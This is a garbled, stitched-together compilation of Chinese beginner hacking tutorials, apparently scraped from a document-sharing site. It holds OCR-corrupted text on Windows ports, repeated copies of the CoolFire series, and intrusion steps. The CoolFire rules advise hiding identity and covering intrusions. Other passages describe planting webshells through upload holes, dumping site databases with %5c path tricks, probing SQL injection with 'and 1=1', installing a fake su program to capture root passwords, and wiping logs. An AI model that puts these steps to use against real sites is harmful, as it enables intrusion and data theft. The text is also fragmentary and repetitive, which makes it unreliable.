7 ! ! Step2? q ?r? ē? q r ? d q r?q r?q ?? r??ēω q ?? rd ? ?? q? r?q r d Step3??q ?? r? ē ?q r ē q ? C O M r ē ? q ?r? ē ? ? d ? ? DCOM ? ?135 ? 2. ?137 138 ? Windows 137 ?? ? ? ?IIS Samba Lotus Notes ?? ?? ? I P ? 137 ? ? 137 ? ǜ ? Windows ?NetBIOS over TCP/IP?NBT?? 137 ? ? ? ??? ? ?? ? IIS ? ? ? ? ? 138 NetBIOS ? ?? ? ?? 137 ? ? ?? 138 ? NetBIOS ? ? NetBIOS ? ? ? ? ? ? ?? ? ? ? ? NetBIOS ? ? 138 137 ? ? ? ? 137 138 ? ? ?NetBIOS ? ? ?? 6-3? 137/138 ? ? ? TCP/IP ? NetBIOS ? ? ǖ Tufq2! ? ? Tufq!3! ?? ! ?
7 ! ! Tufq!4! ?!OfuCJPT 3. ?139 445 139 445 137 138 I P ? ? 139 445 SMB? ? ? DNS ? ? ? IP ? ?Windows2000 ?? Windows NetBIOS ? WINS NetBIOS ? IP ? Windows ?? CIFS DNS ? CIFS SMB ? ?SMB NetBIOS WINS ? CIFS DNS? ? Windows ? ? ?139 445 ? ?? 6-4? ?139/445 Tufq!2! ?? ? ?
coolfire黑客入门教程系列之(六) 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写 这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件 导致恶意入侵别人的电脑或网路, 本人概不负责!! 在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人, 而不是有人故意灌水的吧? 希望新 朋友们能喜欢我们的内容, 有人问到: 有没有跟我们首页性质相近的中文站台? 很遗憾的是目前 我还没有找到.... 看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话, 欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来, 先前我们已经尽了很大的努力将档 案放在国内Server 中, 我想, 由HiNet 连这边应该很快吧? 还是水管塞住的问题?? 如果有人 的位址在.edu.tw 附近的, 欢迎来信要求Mirror~~ 我很乐意将档案Mirror 给你, 让其它网 友更方便取这些档案. 好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於Hacker 方面的问题, 也收到了许多 的回应信件, 有许多的问题在这一篇文章中都会有答案, 甚至到现在还有很多的网友们询问甚么https://www.doczj.com/doc/1814354112.html, 是shadow password 的, 请各位多翻翻以前的文章吧!! 在CGI Holes 方面的问题也很多, 所以在 这一篇之後我会找个时间写一写System Holes #2 来让大家对一些网路上常见的程式漏洞有一些基 本的认识. 最近有许多软体更新了, 最令我们注意的当然就是NT 4.0 罗, 因为它的更新肯定会带来很多的 人更新系统, 当然这样先进的作业系统我们还是很期待有人会很快的将它的Bugs 找出来的啦!! UpYours 这套重量级的MailBomb 也出现的新的版本, 这次的V4.0 Beta 2 经试用後发现实在是 改进了很多, 但是相对的危险性也跟著提高, 其改用Delphi 来设计, 使得安装更为方便, 不过
CoolHC Volume 1 By CoolFire 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不 是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !! #1 甚麽是 Hacking ? 就是入侵电脑! 有甚麽好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件 等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最 好不要成为一个 "骇客", 我... 不是! #2 为甚麽要 Hack ? 我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试 它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操 作 !! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使 用!! 注意: 千万不要破坏别人的软体或资料 !! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後 将它改回原状. 3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友. 4. 不要在 bbs 上谈论你 Hack 的任何事情. 5. 在 Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑. 7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你 Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞 的文件 (英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改. 12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须 维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !! 13. 不将你已破解的帐号分享与你的朋友. #4 破解之道 1. 进入主机中 2. 得到 /etc/passwd 3. 得到系统帐号 4. 得到最高权限 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1. 进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25) 或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能 同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进 行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知
coolfire黑客入门教程系列之(一) 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全 的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的 电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不 是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不 负责 !! #1 甚麽是 Hacking ? 就是入侵电脑! 有甚麽好解释的! 大部份有关介绍Hacker 的书籍或小说及文件 等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了,最 好不要成为一个 "骇客", 我... 不是! #2 为甚麽要 Hack ? 我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试 它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操 作 !! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使 用!! 注意: 千万不要破坏别人的软体或资料 !! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状. 3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友. 4. 不要在 bbs 上谈论你 Hack 的任何事情. 5. 在 Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑.
7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你 Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞 的文件 (英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改. 12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须 维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !! 13. 不将你已破解的帐号分享与你的朋友. #4 破解之道 1. 进入主机中 2. 得到 /etc/passwd 3. 得到系统帐号 4. 得到最高权限 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How 1. 进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能 同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知 道, 你知道吗?! 底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入,当然其 中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了 面子.... 一定要删掉这些不堪入目的东西嘛... 示范进入主机的方法: (By CoolFire) (首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也
从理论上说,任何一门语言都可以在任何一个系统上编程,只要找到该系统提供的“接口”和对系统内部机制有深 入的了解就可以了,至少我是这么认为的。正如c语言可以在windows下编程,也同样可以在Linux上大放异彩一样。 编程是一项很繁杂的工作,除了应用编程工具之外,了解系统本身内部工作机理非常重要,这是你写出稳定兼容的 程序所必不可少的前提条件。你要在哪一种系统上编程就要对该系统的机制进行研究,至少你应该知道一个程序在那个 系统上是如何运行的。 一、了解Windows 内部机制 Windows 是一个“基于事件的,消息驱动的”操作系统。 在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会 触发一个相应的“事件”。系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。 每个Windows 应用程序都是基于事件和消息的,而且包含一个主事件循环,它不停地、反复地检测是否有用户事件发 生。每次检测到一个用户事件,程序就对该事件做出响应,处理完再等待下一个事件的发生。 Windows 下的应用程序不断地重复这一过程,直至用户终止程序,用代码来描述实际上也就是一个消息处理过程 的while循环语句。 下面便简单介绍一下与Windows 系统密切相关的几个基本概念: ⒈窗口:这是我要说的第一个概念。似乎是地球人都知道的事儿了,窗口是Windows 本身以及Windows 环境下的 应用程序的基本界面单位,但是很多人都误以为只有具有标题栏、状态栏、最大化、最小化按钮这样标准的方框才叫 窗口。其实窗口的概念很广,例如按钮和对话框等也是窗口哦,只不过是一种特殊的窗口罢
成为一名优秀黑客的 12个基本步骤 黑客攻防是一个极具魅力的技术领域, 但成为一名黑客毫无疑问也并不容易。你必须拥有对新技术的好奇心和积极的学习态度, 具备很深的计算机系统、编程语言和操作系统知识, 并乐意不断地去学习和进步。 如果你想成为一名优秀的黑客,下面是 12种最重要的基础条件,请认真阅读: 1. 学习 UNIX/LINUX UNIX/LINUX是一种安全性更高的开源操作系统, 最早由 AT&T实验室开发, 并在安全界里广泛使用。不懂 UNIX/LINUX,不可能成为一名黑客。 2. C语言编程 UNIX/LINUX这种操作系统就是用 C 语言写的,是最强大的计算机语言,于上世纪 70年由丹尼斯?瑞切开发。想成为一名黑客,必须掌握 C 语言。 3. 学习使用多种编程语言 对于一名黑客而言,要学习使用不只一种编程语言。比如 Python 、 JAVA 、 C++等。网上有很多免费的电子书、学习指南,关键在于你的坚持和努力。 4. 学习了解网络知识 这是另一个必不可少的基础条件, 学习网络知识, 理解网络的构成。懂得不同类型网络之间的差异之处, 清晰的了解 TCP/IP和 UDP 协议。这都是在系统中寻找漏洞的必不可少的技能。理解局域网、广域网, VPN 和防火墙的重要性,精通Wireshark 和 NMAP 这样的网络扫描和数据包分析工具等,多去了解思科、联软、华为国家信息安全厂商的一些新兴技术。 5. 学习使用多种操纵系统 除了 Windows 以外,还有 UNIX/LINUX, Mac 等不同类型和版本的操作系统,而每种操作系统都有自己的漏洞,黑客需要了解这些系统,才能发现其中的漏洞。
最简单的黑客入门教程大全 目录 1 黑客简介 (3) 2 保护自己电脑绝对不做黑客肉鸡 (4) 3 抓肉鸡的几种方法 (8) 4 防止黑客通过Explorer侵入系统 (17) 5 SQL注入详解 (19) 5.1 注入工具 (20) 5.2 php+Mysql注入的误区 (21) 5.3 简单的例子 (23) 5.4 语句构造 (26) 5.5 高级应用 (42) 5.6 实例 (50) 5.7 注入的防范 (55) 5.8 我看暴库漏洞原理及规律1 (56) 5.9 我看暴库漏洞原理及规律2 (61) 6 跨站脚本攻击 (65) 6.1 跨站脚本工具 (65) 6.2 什么是XSS攻击 (66)
6.3 如何寻找XSS漏洞 (66) 6.4 寻找跨站漏洞 (67) 6.5 如何利用 (67) 6.6 XSS与其它技术的结合 (71) 7 XPath注入 (71) 7.1 XPath注入介绍 (71) 7.2 XPath注入工具 (76) 声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介 "黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。如果你只是简单的将"黑客"和"恶意的安全骇客"划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并以此为乐。对于某些人来说,这个词并不准确,而对于另一些人来说,黑客意味着最终能完全掌握某些事情。根据RFC1392的记载,互联网用户词汇将"黑客"定义为:迷恋于获取某些系统尤其是计算机和计算机网络系统内部运作机制的人。而这个词经常被错误的用于贬义环境。在贬义环境中,正确的用词应该是"骇客"。TheJargonWiki对于"黑客"的首次定义为:迷恋于探知可编程系统细节以及如何扩展其功能的人,与大多数只需了解系统基本知识的人
写一个简单的入门教程,整个游戏界面为英文,翻译了一些,,只是引领你入门,接下来的后续任务还是交由你自己来完成。。 游戏长这样: 进入游戏后主界面:
主菜单介绍: 开始 系统状态 设置 信息 ----------------- 进入系统状态选项: [此界面是记录自己的英雄事迹]
这是我目前的成就: 1.你已经接受了这份工作 2.已经完成开机的任务 3.成功运行命令 4.已经成功入侵某组织并且访问了他们的数据,你的雇主给了你一款黑客软件,使用“run‘命令即可运行 5.成功运行此黑客工具 ...... [返回] --------------------------- 全局设置: 技巧及攻略 通过Email分享给好友 通过Facebook分享 联系我们 震动开关
字体颜色 重置档案 [返回] 全局设置里面需要了解的是技巧与攻略这一项----------------------- 进入攻略提示界面: *此部分内容包含游戏技巧指引。 *不知道如何开始游戏? -查看入门指南. *无法通关? -查看提示与答案部分.
此部分可能需要联网查询 -------------------------------------- Hack RUN 玩法技巧 时常输入“help”命令能查看所登陆系统中当前提供的命令行。 你能通过手势点击窗口右上角的“X”符号来退出终端。 旋转你的手机能以纵向或者横向的方式观看终端。 “System Status”按钮将会显示你所完成的成就。 你能使用一些缩短版本的命令,如“h”代表help。 你能使用“web”明天添加一个url地址,如“web i273”或“w i273”。 “Already logged in ? ”如果你跳过一个关卡,你将会看到这样一条消息。试图放弃某一步骤你将无法看到下一关。 *确保你的设备(iPhone,iPad,ipod Touch)已经升级到最新的操作系统版本(3.2版本或更高),你还需要确保已正确设置你的设备上的时间。 *无法通关?千万不要因为这个给应用程序评一个糟糕的分数,请查看提示与攻略部分。 点击[back]返回全局设置界面
网络安全知识入门 近日,因为工作需要,对于网络安全的一些基础的知识做了一些简单的了解,并整理成总结文档以便于学习和分享。 网络安全的知识体系非常庞大,想要系统的完成学习非简单的几天就可以完成的。所以这篇文章是以实际需求为出发点,把需要用到的知识做系统的串联起来,形成知识体系,便于理解和记忆,使初学者可以更快的入门。 首先我们要对网络安全有一个基本的概念。网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。简单来说就是,保护网络不会因为恶意攻击而中断。了解了网络安全的职责,我们就可以从网络攻击的方式,网络攻击检测手段等几个方面来处理。在实际的学习中,我发现直接上手去学习效率并不是很好,因为网络安全也有很多的专业名词是不了解的所以在系统的学习之前对本文可能涉及到的专业名词做一个解释很有必要。 1.IRC服务器:RC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊 天。IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并且只占用很小的带宽资源。 2.TCP协议:TCP(Transmission Control Protocol 传输控制协议)是一种面向连接 的、可靠的、基于字节流的传输层通信协议。TCP的安全是基于三次握手四次挥手的链接释放协议(握手机制略)。
3.UDP协议:UDP 是User Datagram Protocol的简称,UDP协议全称是用户数据报协 议,在网络中它与TCP协议一样用于处理数据包,是一种无连接的协议。其特点是无须连接,快速,不安全,常用于文件传输。 4.报文:报文(message)是网络中交换与传输的数据单元,即站点一次性要发送的数据 块。报文包含了将要发送的完整的数据信息,其长短很不一致,长度不限且可变。 5.DNS:DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映 射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。DNS协议运行在UDP协议之上,使用端口号53。DNS是网络攻击中的一个攻击密集区,需要重点留意。 6.ICMP协议:ICMP是(Internet Control Message Protocol)Internet控制报文协 议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。 7.SNMP协议:简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应 用层协议(application layer protocol)、数据库模型(database schema)和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。 8.僵尸病毒:僵尸网络病毒,通过连接IRC服务器进行通信从而控制被攻陷的计算机。 僵尸网络(英文名称叫BotNet),是互联网上受到黑客集中控制的一群计算机,往往被黑客用来发起大规模的网络攻击。僵尸病毒的目的在我看来是黑客在实施大规模网络攻击之前做好准备工作,提供大量可供发起攻击的“僵尸电脑”。 9.木马病毒:木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控 制另一台计算机。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒对现行网络有很大的威胁。 10.蠕虫病毒:蠕虫病毒,一种常见的计算机病毒。它的传染机理是利用网络进行复制 和传播,传染途径是通过网络和电子邮件。。对于蠕虫,现在还没有一个成套的理论体系。 一般认为:蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性、隐蔽
当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。 无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。 2.权限的扩大 系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。 只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。 攻击的善后工作 1.日志系统简介 如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化 /usr/adm——早期版本的Unix。 /Var/adm新一点的版本使用这个位置。 /Varflort一些版本的Solaris、Linux BSD、Free BSD使用这个位置。 /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。 下面的文件可能会根据你所在的目录不同而不同:
黑客新人必学的网站入侵基本知识 2007-07-08 08:05 1 上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL。 工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。 WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个 WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过 WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。 2 暴库:这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 https://www.doczj.com/doc/1814354112.html,/dispbbs.asp?boardID=7&ID=161,我门就可以把com/dispbbs中间的 /换成%5c,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径http: //https://www.doczj.com/doc/1814354112.html,/后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。 为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。 3 注入漏洞:这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。 怎样利用:我先介绍下怎样找漏洞比如这个网址 https://www.doczj.com/doc/1814354112.html,/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看如果显示正常页面再加上个and 1=2 来看看如果返回正常页面说明没有漏洞如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明
最简单的黑客入门教程 目录 1 黑客简介 (3) 2 保护自己电脑绝对不做黑客肉鸡 (5) 3 抓肉鸡的几种方法 (10) 4 防止黑客通过Explorer侵入系统 (19) 5 SQL注入详解 (22) 5.1 注入工具 (23) 5.2 php+Mysql注入的误区 (24) 5.3 简单的例子 (27) 5.4 语句构造 (30) 5.5 高级应用 (48) 5.6 实例 (57) 5.7 注入的防范 (62) 5.8 我看暴库漏洞原理及规律1 (64) 5.9 我看暴库漏洞原理及规律2 (70) 6 跨站脚本攻击 (75) 6.1 跨站脚本工具 (75) 6.2 什么是XSS攻击 (76) 6.3 如何寻找XSS漏洞 (77) 6.4 寻找跨站漏洞 (78) 6.5 如何利用 (78)
6.6 XSS与其它技术的结合 (81) 7 XPath注入 (82) 7.1 XPath注入介绍 (82) 7.2 XPath注入工具 (87) 声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介 "黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。如果你只是简单的将"黑客"和"恶意的安全骇客"划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并
新手学黑客攻防(入门篇) 内容简介 随着互联网技术的不断发展,信息交流更加高效、便捷,各种新的网络功能不断涌现,网络在促进经济发展、推动社会进步和提高人们的生活质量等方面发挥着越来越重要的作用。然而与此同时,网络的安全问题也变得日趋严重,需要引起每一个电脑用户的重视。在网络中有一群被称为“黑客”的神秘人物。最早黑客是指热心于计算机技术、水平高超的电脑专家,尤指程序设计人员。但到了今天,黑客已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。作为一个有一定操作经验的电脑用户,读者有必要了解一些黑客的知识,通过模拟黑客的行为准则以及入侵网络的方式、方法,反过来发现自身存在的问题,做好防范工作,从而最终保证自己的数据信息和网络财产的安全。本书共11章。第1章介绍黑客的基础知识,包括黑客入侵的途径、入侵命令以及入侵的方式。第2章介绍Windows系统中存在的安全隐患和漏洞。第3章介绍针对Windows系统中存在的漏洞如何设置电脑,从而实现防范黑客通过漏洞攻击电脑的目的。第4章~第6章介绍黑客从信息收集、植入木马、到最后进行远程控制与入侵的一个完整流程。第7章~第9章介绍黑客如何
对QQ、电子邮件与网页进行攻击,以及电脑用户应该怎样防范。第10章介绍防范木马与黑客的一些小方法。最后的第11章介绍被黑客入侵后,如何隐藏信息与创建后门。本书采用全彩印刷,配1张多媒体教学视频光盘。彩色印刷能使图文对比更加鲜明、直观,使学习过程更加愉悦。多媒体教学视频让读者像看电视一样学电脑,学习效果立竿见影。目录 第1章黑客基础知识 1.1 黑客的概述 1.2黑客必经的两道门:IP地址与端口 1.2.1 IP和IP地址 1.2.2 端口的概述 1.2.3 查看端口 1.2.4 关闭端口和限制端口 1.3 黑客常用命令 1.3.1 路由与网关 1.3.2 ping命令 1.3.3 net命令 1.3.4 telnet命令 1.3.5 ftp命令
CoolFire系列讲座第1讲 作者:CoolFire [coolfires@https://www.doczj.com/doc/1814354112.html,] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@https://www.doczj.com/doc/1814354112.html, 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全 的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的 电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不 是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不 负责!! #1 甚么是Hacking ? 就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最 好不要成为一个"骇客", 我... 不是! #2 为甚么要Hack ? 我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试 它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使 用!! 注意: 千万不要破坏别人的软体或资料!! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後 将它改回原状. 3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友. 4. 不要在bbs 上谈论你Hack 的任何事情. 5. 在Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑. 7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞 的文件(英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改.
